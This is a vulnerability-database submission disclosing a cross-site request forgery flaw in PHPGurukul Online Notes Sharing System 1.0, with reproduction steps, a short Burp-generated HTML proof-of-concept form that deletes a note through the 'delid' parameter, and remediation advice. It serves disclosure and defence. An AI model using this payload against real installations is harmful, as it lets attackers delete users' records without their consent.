Enviar #255757: PHPGurukul Online Notes Sharing System 1.0 Cross Site Request Forgeryinformación

TítuloPHPGurukul Online Notes Sharing System 1.0 Cross Site Request Forgery
DescripciónBug Description: A Cross Site Request Forgery (CSRF) vulnerability in "/user/manage-notes.php" endpoint of Online Notes Sharing System 1.0 allows attackers to "Delete" Notes via a crafted html request. Steps to Reproduce: # Exploit Title: Cross Site Request Forgery (CSRF) vulnerability in PHPGurukul Online Notes Sharing System # Date: 20-12-2023 # Exploit Author: dhabaleshwardas # Vendor Homepage: https://phpgurukul.com/ # Software Link: https://phpgurukul.com/online-notes-sharing-system-using-php-and-mysql/ # Version: 1.0 # Tested on: firefox/chrome/brave # CVE : To reproduce the attack: 1- Head to the http://localhost/onss/user/manage-notes.php endpoint after logging into the admin account. 2- Here you can see that we want to delete the 3rd subject "adsadas". So we wrote an HTML code to delete it. <html> <!-- CSRF PoC - generated by Burp Suite Professional --> <body> <script>history.pushState('', '', '/')</script> <form action="http://localhost/onss/user/manage-notes.php"> <input type="hidden" name="delid" value="11" /> <input type="submit" value="Submit request" /> </form> </body> </html> 3- We'll then execute this HTML code and we successfully see that the Data has been deleted successfully. 4- This shows that the endpoint "/user/manage-notes.php" is vulnerable to CSRF attack. 5- CSRF attacks can lead to unauthorized actions being performed on behalf of a user. An attacker could manipulate data within the application, leading to the creation, modification, or deletion of records. Remediation: 1- Implement anti-CSRF tokens (also known as CSRF tokens or synchronizer tokens) in web forms. These tokens are unique per session and are embedded in the HTML form. The server validates the token with each form submission, ensuring that the request is legitimate. 2- Set the SameSite attribute on cookies to control when they are sent with cross-origin requests. This helps mitigate the risk of CSRF by preventing the automatic inclusion of cookies in cross-site requests.
Fuente⚠️ https://github.com/dhabaleshwar/Open-Source-Vulnerabilities/blob/main/csrf_delete_notes.md
Usuario
 dhabaleshwar (UID 58737)
Sumisión2023-12-20 17:29 (hace 2 años)
Moderación2023-12-21 17:06 (24 hours later)
EstadoAceptado
Entrada de VulDB248738 [PHPGurukul Online Notes Sharing System 1.0 /user/manage-notes.php delid falsificación de solicitudes en sitios cruzados]
Puntos20

AnteriorVisión De ConjuntoPróximo

Are you interested in using VulDB?

Download the whitepaper to learn more about our service!